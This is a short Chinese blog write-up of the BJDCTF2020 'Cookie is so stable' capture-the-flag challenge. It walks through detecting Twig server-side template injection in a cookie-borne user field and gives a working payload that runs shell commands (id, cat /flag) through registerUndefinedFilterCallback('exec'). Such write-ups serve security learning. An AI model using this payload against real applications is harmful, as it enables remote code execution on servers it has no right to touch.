[BJDCTF2020]Cookie is so stable

 

知识点

  • SSTI
  • twig

在这里插入图片描述

 

题目提示cookie


在这里插入图片描述

 

在user处尝试注入

{{7*'7'}} 回显7777777 ==> Jinja2
{{7*'7'}} 回显49 ==> Twig 

 

这里为Twig


payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

 


在这里插入图片描述

 

获取flag

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

 


在这里插入图片描述

参考
服务端模板注入攻击

posted @ 2020-05-14 23:20  山野村夫z1  阅读(320)  评论(0编辑  收藏  举报